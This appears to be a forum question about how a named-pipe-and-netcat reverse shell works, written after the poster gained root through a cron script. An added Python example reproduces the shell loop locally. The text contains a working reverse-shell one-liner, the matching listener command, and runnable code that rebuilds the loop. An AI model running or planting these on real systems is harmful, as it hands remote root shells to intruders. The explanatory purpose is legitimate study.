Reverse shell with named pipe and netcat
The root user calls cron, which causes a script with the following content to run (I adapted the script a bit):
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 4445 > /tmp/f
I'm trying to wrap my head around the interaction between sh, netcat, and the named pipe.
Here's my literal reading of the command:
- Create a new named pipe at /tmp/f.
- Write the contents of /tmp/f to an interactive shell.
- Write the output of the shell to netcat.
- The output of netcat is written to the named pipe
After running the command and creating a listening netcat server locally with nc -lvnp 4445, I indeed got root access.
I have a rough intuition that the steps above create an input/output loop between netcat and the shell but I'd love to deepen my knowledge on how this works.
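The following is an added example, not part of the original post, that reproduces the same cat | sh -i | relay > fifo pipeline locally so the loop can be observed from the listener's side. It assumes a POSIX system with /bin/sh and python3; a small Python relay (my own stand-in, not netcat) plays netcat's role of copying its stdin to the socket and the socket to its stdout, the listener binds an ephemeral port on 127.0.0.1 instead of 4445, and the FIFO lives in a temporary directory instead of /tmp/f. The function returns everything the listener received, so the round trip listener -> relay stdout -> FIFO -> cat -> sh stdin -> sh stdout/stderr -> relay stdin -> listener is what produces the returned text.

```python
"""Reproduce the FIFO reverse-shell loop locally, with a Python relay standing in for nc.

Added example, not from the original post. Assumptions: POSIX /bin/sh,
python3 as sys.executable, and a free ephemeral port on 127.0.0.1.
"""
import os
import shlex
import shutil
import socket
import subprocess
import sys
import tempfile

# Stand-in for `nc 127.0.0.1 PORT` (not nc itself): stdin -> socket, socket -> stdout.
# In the pipeline its stdin is the shell's combined stdout/stderr and its stdout is the FIFO.
RELAY = r"""
import socket, sys, threading
s = socket.create_connection(("127.0.0.1", int(sys.argv[1])))

def upstream():                      # shell output (our stdin) -> listener
    while True:
        chunk = sys.stdin.buffer.read1(4096)
        if not chunk:                # shell exited: its stdout pipe hit EOF
            break
        s.sendall(chunk)
    s.shutdown(socket.SHUT_WR)       # tell the listener no more output is coming

threading.Thread(target=upstream, daemon=True).start()
while True:                          # listener -> our stdout, i.e. into the FIFO
    data = s.recv(4096)
    if not data:                     # listener closed: stop writing to the FIFO
        break
    sys.stdout.buffer.write(data)
    sys.stdout.buffer.flush()
"""


def fifo_reverse_shell_roundtrip(commands, timeout=10.0):
    """Run cat FIFO | /bin/sh -i 2>&1 | relay > FIFO against a local listener.

    `commands` are the lines an operator would type at `nc -lvnp`; the return
    value is the text the listener received back (prompts, warnings, output).
    """
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))          # ephemeral port instead of 4445
    listener.listen(1)
    listener.settimeout(timeout)
    port = listener.getsockname()[1]

    workdir = tempfile.mkdtemp()
    fifo = os.path.join(workdir, "f")         # stands in for /tmp/f
    os.mkfifo(fifo)
    relay_path = os.path.join(workdir, "relay.py")
    with open(relay_path, "w") as fh:
        fh.write(RELAY)

    # Same shape as the cron script. The two opens of the FIFO rendezvous:
    # `cat` blocks opening it for reading until `> fifo` opens it for writing.
    pipeline = "cat {f} | /bin/sh -i 2>&1 | {py} {relay} {port} > {f}".format(
        f=shlex.quote(fifo), py=shlex.quote(sys.executable),
        relay=shlex.quote(relay_path), port=port)
    proc = subprocess.Popen(["/bin/sh", "-c", pipeline],
                            stdin=subprocess.DEVNULL,
                            stdout=subprocess.DEVNULL,
                            stderr=subprocess.DEVNULL)
    try:
        conn, _ = listener.accept()
        conn.settimeout(timeout)
        received = bytearray()
        with conn:
            for cmd in commands:
                conn.sendall((cmd + "\n").encode())   # travels socket -> relay -> FIFO -> cat -> sh
            while True:                               # read until the relay shuts down its side
                data = conn.recv(4096)
                if not data:
                    break
                received += data
        # Closing conn makes the relay exit, which closes the FIFO's writer,
        # which gives cat EOF, so the whole pipeline unwinds.
        proc.wait(timeout=timeout)
        return received.decode(errors="replace")
    finally:
        listener.close()
        if proc.poll() is None:
            proc.kill()
        shutil.rmtree(workdir, ignore_errors=True)


if __name__ == "__main__":
    print(fifo_reverse_shell_roundtrip(["id", "echo fifo-loop-ok", "exit"]))
```

Because the shell's stdout and stderr are both piped into the relay, the returned text also contains the shell's prompts and any "no job control" warning an interactive shell prints when it has no terminal; the command output itself is what proves the FIFO carried the listener's input around to the shell.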